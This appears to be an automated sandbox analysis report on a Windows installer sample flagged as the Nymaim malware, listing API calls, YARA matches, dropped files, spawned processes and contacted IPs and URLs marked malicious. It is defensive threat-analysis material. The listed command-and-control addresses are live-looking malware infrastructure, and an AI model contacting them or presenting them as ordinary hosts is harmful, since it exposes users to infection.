Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoA, 0_2_00405224
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: GetLocaleInfoA, 1_2_004085FC
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: GetLocaleInfoA, 1_2_00408648
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer, 2_2_00404D40
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: EnumSystemLocalesW, 2_2_00427041
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: EnumSystemLocalesW, 2_2_0042708C
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: EnumSystemLocalesW, 2_2_00427127
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 2_2_004271B2
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: EnumSystemLocalesW, 2_2_0041E2FF
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: GetLocaleInfoW, 2_2_00427405
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 2_2_0042752B
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: GetLocaleInfoW, 2_2_00427631
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 2_2_00427700
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: GetLocaleInfoW, 2_2_0041E821
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 2_2_00426D9F
Contains functionality to query CPU information (cpuid)
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_0040F7F3 cpuid 2_2_0040F7F3
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00455E7C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,6D715CA0,SetNamedPipeHandleState,6DB87180,CloseHandle,CloseHandle, 1_2_00455E7C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004026C4 GetSystemTime, 0_2_004026C4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00405CC0 GetVersionExA, 0_2_00405CC0
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00453D18 GetUserNameA, 1_2_00453D18

Stealing of Sensitive Information
barindex
Yara detected Nymaim
Source: Yara match File source: 2.2.SplitFiles131.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SplitFiles131.exe.3210000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SplitFiles131.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SplitFiles131.exe.3210000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.376873365.0000000003270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.376708257.0000000003210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.375917003.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 778239 Sample: file.exe Startdate: 05/01/2023 Architecture: WINDOWS Score: 100 47 45.139.105.1 CMCSUS Italy 2->47 49 85.31.46.167 CLOUDCOMPUTINGDE Germany 2->49 51 Snort IDS alert for network traffic 2->51 53 Multi AV Scanner detection for domain / URL 2->53 55 Antivirus detection for URL or domain 2->55 57 5 other signatures 2->57 10 file.exe 2 2->10         started        signatures3 process4 file5 31 C:\Users\user\AppData\Local\...\is-EPSRP.tmp, PE32 10->31 dropped 13 is-EPSRP.tmp 13 30 10->13         started        process6 file7 33 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 13->33 dropped 35 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 13->35 dropped 37 C:\...\unins000.exe (copy), PE32 13->37 dropped 39 3 other files (2 malicious) 13->39 dropped 16 SplitFiles131.exe 20 13->16         started        process8 dnsIp9 41 107.182.129.235, 49697, 80 META-ASUS Reserved 16->41 43 45.139.105.171, 49696, 80 CMCSUS Italy 16->43 45 171.22.30.106, 49698, 80 CMCSUS Germany 16->45 29 C:\Users\user\AppData\...\rf6CwnLa.exe, PE32 16->29 dropped 20 rf6CwnLa.exe 16->20         started        23 cmd.exe 1 16->23         started        file10 process11 signatures12 59 Multi AV Scanner detection for dropped file 20->59 25 taskkill.exe 1 23->25         started        27 conhost.exe 23->27         started        process13
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
45.139.105.171
 unknown Italy
33657 CMCSUS true
45.139.105.1
 unknown Italy
33657 CMCSUS true
85.31.46.167
 unknown Germany
43659 CLOUDCOMPUTINGDE true
107.182.129.235
 unknown Reserved
11070 META-ASUS true
171.22.30.106
 unknown Germany
33657 CMCSUS false

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte true
  • URL Reputation: safe
 unknown
http://107.182.129.235/storage/extension.php true
  • URL Reputation: safe
 unknown
http://107.182.129.235/storage/ping.php true
  • URL Reputation: safe
 unknown
http://171.22.30.106/library.php true
  • URL Reputation: malware
 unknown